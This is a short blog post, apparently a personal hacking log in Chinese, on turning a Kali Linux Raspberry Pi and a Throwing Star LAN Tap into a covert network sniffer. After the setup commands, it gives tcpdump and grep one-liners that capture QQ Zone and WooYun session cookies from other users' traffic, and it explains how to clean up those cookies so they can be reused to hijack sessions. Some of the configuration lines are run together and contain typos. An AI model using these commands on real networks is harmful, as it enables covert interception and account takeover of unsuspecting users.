H4rdy's blogs - Raspberry Pi&Throwing Star LAN Tap

继续折腾Raspberry Pi.

The use of the installation of Kali Linux Pi and Throwing Star LAN Tap.

使用安装了Kali linux的树莓派和Throwing Star LAN Tap，能够更加隐蔽的进行内网数据嗅探.

0x0

一个安装了kali linux的树莓派

windows笔记本

2短根网线

一个Throwing Star LAN Tap

usb无线网卡

移动电源

0x1

笔记本创建wifi热点

配置树莓派无线网络

ifconfig wlan0 up

sudo apt-get install wpasupplicant

sudo nano /etc/wpa.cof

network={ssid="创建的WIFI的SSID"proto=RSNkey_mgmt=WPA-PSKpairwise=CCMP TKIPgroup=CCMP TKIPpsk="WIFI密码"}

sudo nano /etc/network/interfaces

auto lo
iface lo inet loopbackiface eth0 inet dhcp
allow-hotplug wlan0iface wlan0 inet manualwpa-roam /etc/wpa.conf

安装tcpdump

apt-get install tcpdump

reboot

0x2

0x3

电脑ssh连Pi

ifconfig eth0 up 默认eth0是不启用的

执行 tcpdump -XvvennSs 0 -i eth0

即可抓到所有http数据包

后续：

优化整个过程，

执行

tcpdump -XvvennSs 0 -i eth0 | cut -b 52- | grep -A 18 -E 'pt2gguin' 即可抓到qq空间的cookie

执行

tcpdump -XvvennSs 0 -i eth0 | cut -b 52- | grep -A 22 -E 'Hm_lvt_' 即可抓到wooyun的cookie

获取到的cookie中，在每个参数前都会有个“.” 删除 "." 就可以利用这个cookie